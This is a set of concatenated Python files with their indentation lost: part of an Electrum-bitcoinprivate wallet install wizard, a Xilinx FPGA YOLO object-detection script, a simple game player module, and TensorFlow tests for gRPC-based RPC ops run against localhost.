QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum-bitcoinprivate 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename)
.scaledToWidth(64, Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On macOS they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(msg)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=()):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMaximumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum-bitcoinprivate communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum-bitcoinprivate "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
xyolo.py | #!/usr/bin/env python
#
# // SPDX-License-Identifier: BSD-3-CLAUSE
#
# (C) Copyright 2018, Xilinx, Inc.
#
import os,sys,timeit,json
from multiprocessing import Process, Queue
# To control print verbosity
import logging as log
# Bring in some utility functions from local file
from yolo_utils import cornersToxywh,sigmoid,softmax,generate_colors,draw_boxes
import numpy as np
# Bring in a C implementation of non-max suppression
sys.path.append('nms')
import nms
# Bring in Xilinx Caffe Compiler, and Quantizer
# We directly compile the entire graph to minimize data movement between host, and card
from xfdnn.tools.compile.bin.xfdnn_compiler_caffe import CaffeFrontend as xfdnnCompiler
from xfdnn.tools.quantize.quantize import CaffeFrontend as xfdnnQuantizer
# Bring in Xilinx XDNN middleware
from xfdnn.rt import xdnn
from xfdnn.rt import xdnn_io
class xyolo():
def __init__(self,batch_sz=10,in_shape=[3,608,608],quantizecfg="yolo_deploy_608.json",xclbin=None,
netcfg="yolo.cmds",datadir="yolov2.caffemodel_data",labels="coco.names",xlnxlib="libxfdnn.so",firstfpgalayer="conv0",classes=80,verbose=False):
if verbose:
log.basicConfig(format="%(levelname)s: %(message)s",level=log.DEBUG)
log.info("Running with verbose output")
else:
log.basicConfig(format="%(levelname)s: %(message)s")
if xclbin is None:
log.error("XYOLO initialized without reference to xclbin, please set this before calling detect!!")
sys.exit(1)
self.xdnn_handle = None
log.info("Reading labels...")
with open(labels) as f:
names = f.readlines()
self.names = [x.strip() for x in names]
# Arguments exposed to user
self.in_shape = in_shape
self.quantizecfg = quantizecfg
self.xclbin = xclbin
self.netcfg = netcfg
self.datadir = datadir
self.labels = labels
self.xlnxlib = xlnxlib
self.batch_sz = batch_sz
self.firstfpgalayer = firstfpgalayer # User may be using their own prototxt w/ unique names
self.classes = classes # User may be using their own prototxt with different region layer
# Arguments not exposed to user
## COCO categories are not sequential
self.img_raw_scale = "255.0"
self.img_input_scale = "1.0"
self.cats = [1,2,3,4,5,6,7,8,9,10,11,
13,14,15,16,17,18,19,20,21,22,23,24,25,
27,28,
31,32,33,34,35,36,37,38,39,40,41,42,43,44,
46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,
67,
70,
72,73,74,75,76,77,78,79,80,81,82,
84,85,86,87,88,89,90]
self.images = None
self.scaleA = 10000
self.scaleB = 30
self.PE = -1
self.transform = "yolo" # XDNN_IO will scale/letterbox the image for YOLO network
self.img_mean = "0,0,0"
self.net_w = self.in_shape[1]
self.net_h = self.in_shape[2]
import math
self.out_w = int(math.ceil(self.net_w / 32.0))
self.out_h = int(math.ceil(self.net_h / 32.0))
self.bboxplanes = 5
#self.classes = 80
self.scorethresh = 0.24
self.iouthresh = 0.3
self.groups = self.out_w*self.out_h
self.coords = 4
self.groupstride = 1
self.batchstride = (self.groups)*(self.classes+self.coords+1)
self.beginoffset = (self.coords+1)*(self.out_w*self.out_h)
self.outsize = (self.out_w*self.out_h*(self.bboxplanes+self.classes))*self.bboxplanes
self.colors = generate_colors(self.classes) # Generate color pallette for drawing boxes
config = vars(self)
self.q_fpga = Queue(maxsize=1)
self.q_bbox = Queue(maxsize=1)
if "single_proc_mode" in config:
self.proc_fpga = None
self.proc_bbox = None
else:
self.proc_fpga = Process(target=self.fpga_stage, args=(config, self.q_fpga, self.q_bbox))
self.proc_bbox = Process(target=self.bbox_stage, args=(config, self.q_bbox))
self.proc_fpga.start()
self.proc_bbox.start()
log.info("Running network input %dx%d and output %dx%d"%(self.net_w,self.net_h,self.out_w,self.out_h))
def __enter__(self):
log.info("Entering XYOLO WITH")
return self
def __exit__(self,*a):
self.stop()
if self.xdnn_handle:
xdnn.closeHandle()
@staticmethod
def fpga_stage(config, q_fpga, q_bbox, maxNumIters=-1):
config['xdnn_handle'], handles = xdnn.createHandle(config['xclbin'], "kernelSxdnn_0")
if config['xdnn_handle'] != 0:
log.error("Failed to start FPGA process ",
" - could not open xclbin %s %s!" \
% (config['xclbin'], config['xlnxlib']))
sys.exit(1)
fpgaRT = xdnn.XDNNFPGAOp(handles, config)
# Allocate FPGA Outputs
fpgaOutSize = config['out_w']*config['out_h']*config['bboxplanes']*(config['classes']+config['coords']+1)
fpgaOutput = np.empty((config['batch_sz'], fpgaOutSize,), dtype=np.float32, order='C')
raw_img = np.empty(((config['batch_sz'],) + config['in_shape']), dtype=np.float32, order='C')
numIters = 0
while True:
numIters += 1
if maxNumIters > 0 and numIters > maxNumIters:
break
job = q_fpga.get()
if job == None:
q_bbox.put(None) # propagate 'stop' signal downstream
sys.exit(0)
images = job['images']
display = job['display']
coco = job['coco']
if images is not None:
log.info("Running Image(s):")
log.info(images)
config['images'] = images
else:
log.error("Detect requires images as a parameter")
continue
log.info("Preparing Input...")
shapes = []
for i,img in enumerate(images):
raw_img[i,...], s = xdnn_io.loadYoloImageBlobFromFile(img, config['in_shape'][1], config['in_shape'][2])
shapes.append(s)
job['shapes'] = shapes # pass shapes to next stage
# EXECUTE XDNN
log.info("Running %s image(s)"%(config['batch_sz']))
startTime = timeit.default_timer()
fpgaRT.execute(raw_img, fpgaOutput, config['PE'])
elapsedTime = timeit.default_timer() - startTime
# Only showing time for second run because first is loading script
log.info("\nTotal FPGA: %f ms" % (elapsedTime*1000))
log.info("Image Time: (%f ms/img):" % (elapsedTime*1000/config['batch_sz']))
q_bbox.put((job, fpgaOutput))
@staticmethod
def bbox_stage(config, q_bbox, maxNumIters=-1):
results = []
numIters = 0
while True:
numIters += 1
if maxNumIters > 0 and numIters > maxNumIters:
break
payload = q_bbox.get()
if payload == None:
break
(job, fpgaOutput) = payload
fpgaOutput = fpgaOutput.flatten()
images = job['images']
display = job['display']
coco = job['coco']
for i in range(config['batch_sz']):
log.info("Results for image %d: %s"%(i, images[i]))
startidx = i*config['outsize']
softmaxout = fpgaOutput[startidx:startidx+config['outsize']]
# first activate first two channels of each bbox subgroup (n)
for b in range(config['bboxplanes']):
for r in range(config['batchstride']*b, config['batchstride']*b+2*config['groups']):
softmaxout[r] = sigmoid(softmaxout[r])
for r in range(config['batchstride']*b+config['groups']*config['coords'], config['batchstride']*b+config['groups']*config['coords']+config['groups']):
softmaxout[r] = sigmoid(softmaxout[r])
# Now softmax on all classification arrays in image
for b in range(config['bboxplanes']):
for g in range(config['groups']):
softmax(config['beginoffset'] + b*config['batchstride'] + g*config['groupstride'], softmaxout, softmaxout, config['classes'], config['groups'])
# NMS
bboxes = nms.do_baseline_nms(softmaxout, job['shapes'][i][1], job['shapes'][i][0], config['net_w'], config['net_h'], config['out_w'], config['out_h'], config['bboxplanes'], config['classes'], config['scorethresh'], config['iouthresh'])
# REPORT BOXES
log.info("Found %d boxes"%(len(bboxes)))
for j in range(len(bboxes)):
log.info("Obj %d: %s" % (j, config['names'][bboxes[j]['classid']]))
log.info("\t score = %f" % (bboxes[j]['prob']))
log.info("\t (xlo,ylo) = (%d,%d)" % (bboxes[j]['ll']['x'], bboxes[j]['ll']['y']))
log.info("\t (xhi,yhi) = (%d,%d)" % (bboxes[j]['ur']['x'], bboxes[j]['ur']['y']))
filename = images[i]
if coco:
image_id = int(((filename.split("/")[-1]).split("_")[-1]).split(".")[0])
else:
image_id = filename.split("/")[-1]
x,y,w,h = cornersToxywh(bboxes[j]["ll"]["x"],bboxes[j]["ll"]["y"],bboxes[j]['ur']['x'],bboxes[j]['ur']['y'])
result = {"image_id":image_id,"category_id": config['cats'][bboxes[j]["classid"]],"bbox":[x,y,w,h],"score":round(bboxes[j]['prob'],3)}
results.append(result)
# DRAW BOXES w/ LABELS
if display:
draw_boxes(images[i],bboxes,config['names'],config['colors'])
log.info("Saving results as results.json")
with open("results.json","w") as fp:
fp.write(json.dumps(results, sort_keys=True, indent=4))
def detect(self,images=None,display=False,coco=False):
self.q_fpga.put({
'images': images,
'display': display,
'coco': coco
})
config = vars(self)
if not self.proc_fpga:
# single proc mode, no background procs, execute explicitly
self.fpga_stage(config, self.q_fpga, self.q_bbox, 1)
self.bbox_stage(config, self.q_bbox, 1)
def stop(self):
if not self.proc_fpga:
return
self.q_fpga.put(None)
self.proc_fpga.join()
self.proc_bbox.join()
self.proc_fpga = None
self.proc_bbox = None
if __name__ == '__main__':
config = xdnn_io.processCommandLine()
# Define the xyolo instance
with xyolo(batch_sz=len(config["images"]),in_shape=eval(config["in_shape"]),quantizecfg=config["quantizecfg"],xclbin=config["xclbin"],verbose=True) as detector:
detector.detect(config["images"])
detector.stop()
|
player.py | # -*- coding: UTF-8 -*-
import threading, time
from .model import *
class Player:
def __init__(self, color, name):
self._color = color
self._name = name
self._score = 0
@property
def color(self):
return self._color
@property
def name(self):
return self._name
@property
def score(self):
return self._score
def _start_new_game(self):
self._score = 0
self.start_new_game()
def _game_is_over(self, is_win):
self.game_is_over(is_win)
def start_new_game(self):
pass
def game_is_over(self, is_win):
pass
class HumanPlayer(Player):
def __init__(self, color, name, game_controller):
super(HumanPlayer, self).__init__(color, name)
self.__game_controller = game_controller
def move(self, coordinate):
self.__game_controller.move(Piece(self.color, coordinate))
class AIPlayer(Player):
def __init__(self, color, name, game_controller):
super(AIPlayer, self).__init__(color, name)
self.__game_controller = game_controller
self._board = None
self._history = None
self._last_piece = None
self.__thread = None
def last_move(self, piece, board, history, next_player_color):
self._board = board
self._history = history
self._last_piece = piece
if (next_player_color == self.color):
self.__thread = threading.Thread(target=self.move)
self.__thread.start()
def move(self, coordinate=None):
time.sleep(0.01)
self.__game_controller.move(Piece(self.color, coordinate))
def start_new_game(self):
pass
def game_is_over(self, is_win):
pass
|
rpc_ops_test.py | # Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for rpc_ops.py."""
import threading
import time
import numpy as np
import portpicker
from tensorflow.python.distribute.experimental.rpc import rpc_ops
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function as eager_def_function
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_spec
from tensorflow.python.framework import test_util
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.util import nest
@test_util.with_eager_op_as_function
class RpcOpsTest(test.TestCase):
def setUp(self):
super(RpcOpsTest, self).setUp()
cpus = config.list_physical_devices("CPU")
# Set 2 virtual CPUs
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
def test_generated_rpc_ops(self):
@eager_def_function.function(input_signature=[
tensor_spec.TensorSpec([], dtypes.int32),
tensor_spec.TensorSpec([], dtypes.int32)
])
def remote_fn(a, b):
return math_ops.multiply(a, b)
concrete_remote_fn = remote_fn.get_concrete_function()
a = variables.Variable(2, dtype=dtypes.int32)
b = variables.Variable(3, dtype=dtypes.int32)
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
server_resource = rpc_ops.gen_rpc_ops.rpc_server(server_address=address)
rpc_ops.gen_rpc_ops.rpc_server_register(
server_resource,
f=concrete_remote_fn,
captured_inputs=concrete_remote_fn.captured_inputs,
output_specs=rpc_ops.get_output_specs_from_function(concrete_remote_fn),
method_name="multiply")
rpc_ops.gen_rpc_ops.rpc_server_start(server_resource)
client_handle, _ = rpc_ops.gen_rpc_ops.rpc_client(
server_address=address, timeout_in_ms=5000)
future_resource, deleter = rpc_ops.gen_rpc_ops.rpc_call(
client_handle, args=[a, b], method_name="multiply", timeout_in_ms=0)
error_code, _ = rpc_ops.gen_rpc_ops.rpc_check_status(future_resource)
self.assertAllEqual(error_code, 0)
self.assertAllEqual(
rpc_ops.gen_rpc_ops.rpc_get_value(future_resource, Tout=[dtypes.int32]),
[6])
resource_variable_ops.EagerResourceDeleter(
handle=server_resource, handle_device=server_resource.device)
resource_variable_ops.EagerResourceDeleter(
handle=client_handle, handle_device=client_handle.device)
rpc_ops.gen_rpc_ops.delete_rpc_future_resource(future_resource, deleter)
def test_exported_rpc_api_static_factory(self):
@eager_def_function.function(input_signature=[
tensor_spec.TensorSpec([], dtypes.int32),
tensor_spec.TensorSpec([], dtypes.int32)
])
def _remote_fn(a, b):
return math_ops.multiply(a, b)
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
server_resource = rpc_ops.Server.create("grpc", address)
server_resource.register("multiply", _remote_fn)
server_resource.start()
client = rpc_ops.Client.create("grpc", address=address, name="test_client")
a = variables.Variable(2, dtype=dtypes.int32)
b = variables.Variable(3, dtype=dtypes.int32)
mul_or = client.call(
args=[a, b],
method_name="multiply",
output_specs=tensor_spec.TensorSpec((), dtypes.int32))
self.assertAllEqual(mul_or.is_ok(), True)
self.assertAllEqual(mul_or.get_value(), 6)
# Test empty client name
client1 = rpc_ops.Client.create("grpc", address)
mul_or = client1.call(
args=[a, b],
method_name="multiply",
output_specs=tensor_spec.TensorSpec((), dtypes.int32))
self.assertAllEqual(mul_or.is_ok(), True)
self.assertAllEqual(mul_or.get_value(), 6)
# Test without output_spec
mul_or = client1.multiply(a, b)
self.assertAllEqual(mul_or.is_ok(), True)
self.assertAllEqual(mul_or.get_value(), 6)
self.assertEqual(client1.multiply.__doc__,
"RPC Call for multiply method to server " + address)
def test_rpc_ops_wrapper(self):
@eager_def_function.function(input_signature=[
tensor_spec.TensorSpec([], dtypes.int32),
tensor_spec.TensorSpec([], dtypes.int32)
])
def _remote_fn(a, b):
return math_ops.multiply(a, b)
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
server_resource = rpc_ops.GrpcServer(address)
@eager_def_function.function(input_signature=[
tensor_spec.TensorSpec([], dtypes.int32),
tensor_spec.TensorSpec([], dtypes.int32)
])
def add_fn(a, b):
return math_ops.add(a, b)
# Register TF function
server_resource.register("multiply", _remote_fn)
# Register concrete Function
server_resource.register("add", add_fn.get_concrete_function())
server_resource.start()
client = rpc_ops.GrpcClient(address=address, name="test_client")
a = variables.Variable(2, dtype=dtypes.int32)
b = variables.Variable(3, dtype=dtypes.int32)
mul_or = client.call(
args=[a, b],
method_name="multiply",
output_specs=tensor_spec.TensorSpec((), dtypes.int32))
self.assertAllEqual(mul_or.is_ok(), True)
self.assertAllEqual(mul_or.get_value(), 6)
add_or = client.call(
args=[a, b],
method_name="add",
output_specs=tensor_spec.TensorSpec((), dtypes.int32))
self.assertAllEqual(add_or.is_ok(), True)
self.assertAllEqual(add_or.get_value(), 5)
# Test empty client name
client1 = rpc_ops.GrpcClient(address, list_registered_methods=True)
mul_or = client1.call(
args=[a, b],
method_name="multiply",
output_specs=tensor_spec.TensorSpec((), dtypes.int32))
self.assertAllEqual(mul_or.is_ok(), True)
self.assertAllEqual(mul_or.get_value(), 6)
# Test without output_spec
mul_or = client1.multiply(a, b)
self.assertAllEqual(mul_or.is_ok(), True)
self.assertAllEqual(mul_or.get_value(), 6)
self.assertEqual(client1.multiply.__doc__,
"RPC Call for multiply method to server " + address)
def test_output_specs(self):
@eager_def_function.function(
input_signature=[tensor_spec.TensorSpec([], dtypes.int32)])
def test_dict(val):
return {"key": val}
@eager_def_function.function(
input_signature=[tensor_spec.TensorSpec([], dtypes.int32)])
def is_positive(a):
if a > 0:
return True
return False
@eager_def_function.function(input_signature=[])
def do_nothing():
return []
@eager_def_function.function(
input_signature=[tensor_spec.TensorSpec([], dtypes.int32)])
def test_nested_structure(v):
return {"test": (v, [v, v]), "test1": (v,)}
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
server_resource = rpc_ops.GrpcServer(address)
server_resource.register("test_dict", test_dict)
server_resource.register("is_positive", is_positive)
server_resource.register("test_nested_structure", test_nested_structure)
server_resource.register("do_nothing", do_nothing)
server_resource.start()
client = rpc_ops.GrpcClient(
address=address, name="test_client", list_registered_methods=True)
a = variables.Variable(2, dtype=dtypes.int32)
result_or = client.test_dict(a)
self.assertAllEqual(result_or.is_ok(), True)
nest.map_structure(self.assertAllEqual, result_or.get_value(), {"key": 2})
self.assertTrue(client.is_positive(a))
result_or = client.test_nested_structure(a)
self.assertAllEqual(result_or.is_ok(), True)
nest.map_structure(self.assertAllEqual, result_or.get_value(), {
"test": (2, [2, 2]),
"test1": (2,)
})
result_or = client.do_nothing()
self.assertAllEqual(result_or.is_ok(), True)
self.assertAllEqual(result_or.get_value(), [])
def test_input_specs(self):
@eager_def_function.function(input_signature=[{
"a": tensor_spec.TensorSpec([], dtypes.int32),
"b": tensor_spec.TensorSpec([], dtypes.int32)
}])
def test_input_dict(value):
return math_ops.add(value["a"], value["b"])
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
server_resource = rpc_ops.GrpcServer(address)
server_resource.register("test_input_dict", test_input_dict)
server_resource.start()
client = rpc_ops.GrpcClient(
address=address, name="test_client", list_registered_methods=True)
a = variables.Variable(2, dtype=dtypes.int32)
b = variables.Variable(3, dtype=dtypes.int32)
result_or = client.test_input_dict({"a": a, "b": b})
self.assertAllEqual(result_or.is_ok(), True)
self.assertAllEqual(result_or.get_value(), 5)
with self.assertRaises(TypeError):
client.test_input_dict([a, b])
def test_call_register_ordering(self):
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
# Create client succeeds before server start and registration
client = rpc_ops.GrpcClient(address)
# Create client with list_registered_methods fails before server is started.
with self.assertRaises(errors.DeadlineExceededError):
rpc_ops.GrpcClient(
address,
name="client1",
list_registered_methods=True,
timeout_in_ms=1)
v = variables.Variable(initial_value=0, dtype=dtypes.int64)
@eager_def_function.function(
input_signature=[tensor_spec.TensorSpec([], dtypes.int64)])
def assign_add(a):
v.assign_add(a)
@eager_def_function.function(input_signature=[])
def read_var():
return v.value()
server = rpc_ops.GrpcServer(address)
def start_server():
# Delay server start to test whether client creation also waits
# till server is up.
time.sleep(1)
server.register("assign_add", assign_add)
server.start()
t = threading.Thread(target=start_server)
t.start()
# Create same "client1" again should succeed.
client1_with_listed_methods = rpc_ops.GrpcClient(
address, name="client1", list_registered_methods=True)
result_or = client1_with_listed_methods.assign_add(
variables.Variable(2, dtype=dtypes.int64))
self.assertAllEqual(result_or.is_ok(), True)
result_or = client.call("assign_add",
[variables.Variable(2, dtype=dtypes.int64)])
self.assertAllEqual(result_or.is_ok(), True)
# Create client with registered methods
client2_with_listed_methods = rpc_ops.GrpcClient(
address=address, name="client2", list_registered_methods=True)
result_or = client2_with_listed_methods.assign_add(
variables.Variable(2, dtype=dtypes.int64))
self.assertAllEqual(result_or.is_ok(), True)
self.assertAllEqual(v, 6)
# Register new method after server started.
with self.assertRaisesRegex(
errors.FailedPreconditionError,
"All methods must be registered before starting the server"):
server.register("read_var", read_var)
def test_client_timeout(self):
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
@eager_def_function.function(input_signature=[
tensor_spec.TensorSpec([], dtypes.int32),
tensor_spec.TensorSpec([], dtypes.int32)
])
def add(a, b):
return math_ops.add(a, b)
server = rpc_ops.GrpcServer(address)
def start_server():
# Delay server start to simulate deadline exceeded for 1st RPC call
# response. Client waits till server is started, thus it can trigger
# deadline exceeded.
time.sleep(1)
server.register("add", add)
server.start()
t = threading.Thread(target=start_server)
t.start()
# Create client with list_registered_methods fails before server is started.
with self.assertRaises(errors.DeadlineExceededError):
rpc_ops.GrpcClient(
address,
name="client1",
list_registered_methods=True,
timeout_in_ms=1)
# Create same client again should succeed with
# list_registered_methods=False. Default timeout for client is 1 ms.
client = rpc_ops.GrpcClient(
address, name="client1", list_registered_methods=False, timeout_in_ms=1)
# Make explicit RPC call, the default timeout of 1 ms should lead to
# deadline exceeded error.
result_or = client.call(
"add", [constant_op.constant(20),
constant_op.constant(30)])
self.assertAllEqual(result_or.is_ok(), False)
error_code, _ = result_or.get_error()
self.assertAllEqual(error_code, errors.DEADLINE_EXCEEDED)
# Specifying reasonable timeout for call should succeed.
result_or = client.call(
"add", [constant_op.constant(20),
constant_op.constant(30)],
timeout_in_ms=5000)
self.assertAllEqual(result_or.is_ok(), True)
error_code, _ = result_or.get_error()
# Test timeouts for convenience methods
# Client with no default timeout.
client = rpc_ops.GrpcClient(
address, name="client2", list_registered_methods=True)
# Restart server again with delay to simulate deadline exceeded.
del server
server = rpc_ops.GrpcServer(address)
t = threading.Thread(target=start_server)
t.start()
# Call fails with 1 ms timeout.
result_or = client.add(
constant_op.constant(20), constant_op.constant(30), timeout_in_ms=1)
